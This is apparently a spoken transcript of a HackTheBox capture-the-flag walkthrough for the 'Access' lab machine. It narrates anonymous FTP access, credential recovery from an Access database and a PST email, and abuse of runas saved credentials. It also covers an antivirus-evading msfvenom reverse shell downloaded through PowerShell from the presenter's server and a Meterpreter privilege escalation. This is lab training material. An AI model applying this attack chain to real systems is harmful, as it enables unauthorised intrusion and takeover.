What's up, YouTube? I know I've never made a video like this before, but being a cybersecurity individual, I decided I'd make some HackTheBox tutorials. So the first is going to be on this machine called Access. So I'm just going to go ahead and dive right in it, because for those of you that are watching this, you probably came here for a reason. So I'm going to start off doing an Nmap Scan on the IP here with version detection and safe scripts. I actually already ran that, so I can go ahead and spit out those results. We can see it's running FTP, Telnet, and an HTTP server. I'm going to spoil it for you, let you know that there's not much running on the HTTP server, so we're really just going to go right into FTP. I could run some, NSE scripts to try to detect if anonymous FTP logins allowed, but why not just go ahead and try to do it by hand. So if I go ahead and FTP there and I say anonymous and I leave the password blank, it lets me in. So clearly they let you log in anonymously. So let's see what they got. They got two folders. Go into backups. Render again. We have a backup.mdb file. So I can type binary to put myself in binary mode. Pull that backup.mdb file by typing get backup.mdb, which I already did. And then I would also go back here. Go into the other folder. See what we got here. I would also say get accesscontrol.zip. I think I already have these. Yeah, I do. Alright, cool. Sweet. So I already have those, and those are the only two files you're going to find on there. So we can go ahead and exit out of the FTP shell. And let's just run file on backup.mdb to see what kind of file that is. That is a Microsoft Access database. So you could parse this out with the command line. I actually was lazy and just went ahead and opened up a Microsoft Access on my Windows 10 machine. And if you go in, you see that there's a table called auth user. In there, there's a password stored. So you can go ahead and copy that password and use it for something. So we're going to try use that to log into the VM as security. So it has Telnet open. So if I try to Telnet to 10.10.10.98, and the username in the MDB was security. Right. That was engineer. Okay. Let's say engineer. Paste that password. Now that's not going to work because that's the wrong credential. So we ought to start investigating the other thing we received here, which is the accesscontrol.zip file. Just ignore this for now. Pretend you didn't see that. So I'm going to try to go ahead and unzip that with the GUI. So if I go into Home Access, Demo, I try to unzip the zip file. It tells me there's a password required. If you try to just run unzip accesscontrol.zip, it would give you an error. And some people in forums are saying, "Oh my God, the file's it's corrupted," but it's not. You just need a password. So we're gonna try that password I just got, and it completed successfully. So what do we have here? What we have is a PST folder, or PST file rather. So that's pretty neat. So we're going to go ahead and search through the contents of that PST. Pretend you didn't see this either. So we're going to go ahead and make a directory called PST export. If I can type properly. Okay. And then we're going to go ahead and run a program called readPST, which is great for extracting the contents of PST files. So the output to PST export, and then just plop in all these parameters. Some of these might not be necessary, but I use them anyway. And we're going to pass it the accesscontrol.pst file. So it looks like I extracted two items. And so if we go into PST export, we can see there's an access control folder, and in there are 2 files. Now what PST export likes to do is it likes to make 2 exports for each email in email format and in message format. So I'm just going to go ahead and cat 2.eml. And there's a whole bunch of gobbledygook headers and markup here, but at the top there's the actual message. So I say the password for the security account has been changed to access controller with all that gobbledygook. So we're going to go ahead and write that down, which I've actually already done, and try to use these credentials to log into the box. So if I try to telnet again I mentioned security. Okay, login, security, paste that password. What, the handle's invalid? What the heck does that mean? It's weird. There we go, okay. Sketch. Alright, so I am access/security. Now, what you do here is you do a bunch of enumeration stuff. You know, you might run some PowerShell scripts looking for any sort of way to privilege escalate, but I'm just going to cut that out and kind of cut to the chase here. So I'm going to run a command here to get a list of users on the system. So if I type get, excuse me, you can't backspace in this telnet, it's pretty awful, so I just have to hit enter and suck it up. I'm going to say PowerShell -command, in parentheses, get WMI object Win32 user account. I'm using PowerShell because this system really doesn't like you to invoke WMI from the command line directly. It doesn't let you execute exes from the command line. It's kind of like a jailed environment a little bit. But anyway, here's a list of our users. And something that you're going to find if you do proper enumeration is if you do command key /list. There's a number of other ways to do the same thing, but we can see that we have stored credentials for the administrator account, which is pretty neat. And so what we might be able to do then is use run as. So if I type run as /user administrator, oh my god, I screwed it up again. Run as /user :administrator we'll do no profile for the hell of it, and here's a crucial part, save cred. We're going to see if there's any saved credentials that the security user has used to invoke administrator. And we're just going to say command.exe/c. Actually, I changed my mind. I don't actually want to do that. I have to cancel out and... Oh my god, stop. Oh, did it time out on me? Somebody must have reset the box. Or not. Yeah, my connection's going across the Atlantic Ocean to get to this box, so it's a little bit sluggish. There we go. Command/sleep. Who am I? And if we just run that, we're not going to see the output of that command. So I'm going to pipe the output to c:/users/security/me.txt. Okay. Alright, so if I do dir, I should see a file called me.txt. So if I do me.txt, there's nothing in there for some reason, which is really weird. Here, let's just copy the command that I have written down. Oh, and by the way, the flag. So, the user flag is right there. You can read it, no problem. So, all right, I don't know what I typed wrong the first time, but I made that me.txt file. If I do type me.txt, I can see that the above command ran as administrator. Now, telnet sucks, right? And I want system access. You can actually finish the box right here and just be done with it right now and use this run as administrator to cat the contents of root.txt. But I'm going to take it a step further because that's no fun and actually get like full system access. So what I'm going to do over here is I'm going to type MSF Venom. What I'm going to do is I'm going to create a reverse shell executable that's going to go ahead and spawn a reverse shell in this machine to connect back to me using meterpreter, which is way cleaner than Telnet. So I'm going to say MSF Venom architecture x86 dash platform Windows dash P payload Windows shell slash reverse TCP. Localhost is going to be my IP address, which is 10.12.232. Okay. We're going to do port elite naturally. Hold up. Port equals elite slash B. That shouldn't be necessary. Dash E x86 underscore or slash shikataga. We probably don't need to use shikataganai, but I will anyway, just in case we have any antivirus trying to pick up on our activities. So that's going to take a sec. Hopefully it runs properly. I've actually already ran that command, and I should have, in the wrong folder, I have a file called shell.exe. So we just got to go ahead and copy that shell.exe over to this endpoint, right? So I actually have a saved copy of the wonderful simple HTTP server. If I could actually go to the right place. Tools slash simple HTTP server. It's not auto-completing, so I've got to type Python first. Simple, yeah, there we go. Alright, so I'm running a web server that's basically just going to serve up that reverse shell I generated. So now we need a way to actually pull it down to this machine. So if I do PowerShell -command, I say new object system.net.webclient.download file http:// my IP address 10.10.12.232 :8000 for port 8000, and we're going to be grabbing shell.exe. We're going to save that as shell.exe. Okay. Oh my god, I fat fingered it. Alright, PowerShell. There we go. Download file with 2 arguments. Unable to connect to the remote server. 10.10.12.232. Port 8000. Oh, I said port 800 instead. So let's just do this the easy way and just copy and paste what I've written down here. So copy, paste. Hello. Copy. Paste. Or don't. Fine. Whatever. Oh my god. Sorry, the machine glitched out of me a little bit. It was hanging a little bit for a second there. There we go. I didn't fat finger at that time. So you can see that, this Python script spat out a log saying that this machine pulled the file, which is awesome. And if I do dir, I should have a shell.exe. Except the machine's being really slow. There we go. Shell.exe, perfect. Okay. What we're going to do next is we're going to say, in fact, let's just go ahead and make this easy and just paste it. So I'm going to run PowerShell, invoke a command. That's the run command. I'm going to do the run as command again and spawn command.exe to start up that shell, the executable. And again, that's going to be with run as using those saved credentials, so it runs as administrator. Okay, fine, I guess I'm doing that again. That's what I meant to do. All right. But before I run that, I have to get my reverse shell up and ready to go. So I'm going to go ahead and say msf console to use good old Metasploit framework. I'm going to say use exploit /multi/handler. Set the payload to Windows meterpreter /reverse TCP. If I was worried about evading, network level AV or something, I'd be a little bit more worried about it, but not really a big issue. So I say set lhost 10.10.12. Oh man, what was it again? 232. Set lport to elite. And I should be able to go ahead and be ready for that reverse connection. So if I hit enter over here, bam, we got the reverse shell back to us, and we should be good to go. Now if I type get system, I can see the I am now system, which is pretty sweet. So I'm going to go ahead and enter a shell. Oop. Again, if I could type. Let's see, who am I? So now I have full system access in a meterpreter shell to this machine. Now the weird thing is, and this is really bizarre, this is a particularity with this machine, is that if you go to the flag for the administrator, you can see the flag right there. If you try to spit out the contents, it gives you access denied. I swear to God I fixed this once, because if you run iCackles on the file, you can see that, well, you have full access, but because I did this before, since the machine was reset, but it would have inheritance permissions, and I swear to Jesus that I ran iCackles root.txt/inheritance disable to disable inheritance on that file, and then I could read it, but it's not working. You could talk to somebody else about this box as to the reasons why, but if you're interested in getting the flag, then yeah, my system level meterpreter shell isn't going to help you. But if you're interested in the kind of playing pretend and actually getting system on the machine, then this reverse shell was worth it. Yeah, so there you have it. There's your system level reverse shell. But if you want to just get that flag, what you can do is you can actually do this icky, nasty command. Let's see, we're going to say run as user administrator, no profile, save cred. And we're going to say type administrator. We're just going to type the content of root.txt and plop that into C:/users. The shell's not keeping up with me. user/desktop/ let's call it got.txt. This ever responds. There we go. Oh my god, I fat fingered it. I'm so sorry. Alright, I'm just going to copy it over into my little thing here. Run as user administrator, new profile. Security, I meant. Security. Alright. Oop. Cool. So let's hit enter on that. It's not going to do anything. So if I run the command, I do dir, I should see a file called got.txt. That is the length of the root flag. I'm not going to actually spit out the contents because that would kind of spoil it, but yeah, there you have it. I mean, I kind of made this video longer than it needed to be because not only did I get the flags, but I also went ahead and just went the extra mile and decided to get that system level meterpreter shell. So if you enjoyed the video, please do like and subscribe. And yeah, thank you for watching.